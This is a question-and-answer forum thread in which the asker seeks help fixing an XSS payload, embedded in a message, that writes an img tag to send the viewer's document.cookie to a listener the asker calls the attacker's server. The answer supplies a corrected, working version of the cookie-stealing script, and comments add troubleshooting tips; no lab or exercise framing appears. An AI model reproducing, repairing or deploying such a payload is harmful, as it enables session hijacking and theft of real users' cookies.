# XSS malicious javascript syntax

Tags: javascript, cookies, xss, csrf, javascript-objects

I have a server running on port `4444` on `localhost` that just echoes messages it receives.

I have a JS script embedded in a message that is supposed to send the cookies of whoever looks at it.

Here is the script:

```
     <script>document.write("<img src=http://127.0.0.1:4444?c=" 
+ escape(document.cookie) + " >"); </script>
```

However, this does not send the cookie information to the server. Nothing is echoed back or printed out on the server side. I know the server is running normally because executing `telnet localhost 4444` and typing a message echoes the message back.

Is something wrong with my script?

Answer (score 0):

You should have quotes, and don't use **escape** because it has been deprecated.

```
 <script>document.write('<img src="http://127.0.0.1:4444?c='+ encodeURIComponent(document.cookie) + '">');</script>
```

Comment: Why are you using an **img** tag?

Comment: because it tries to upload an image from `src` but in doing so it sends an HTTP GET request to the URL there (which is where I want to print the cookie)

Comment: I am thinking the syntax of the script may be wrong. I know the img tag needs to be there

Comment: What are you trying to do and why are you trying to do it?

Comment: I am trying to send the cookies of the user's browser to the URL defined by `src`, which is the attacker's server.

Comment: This is an old technique, browsers could have evolved to workaround it by now. Did you try requesting to the same origin server, like same host and same port? Did you checked the cache? GET requests cache offline by default using the request URL as key.

Comment: Just block the attacker - don't waste your time on them.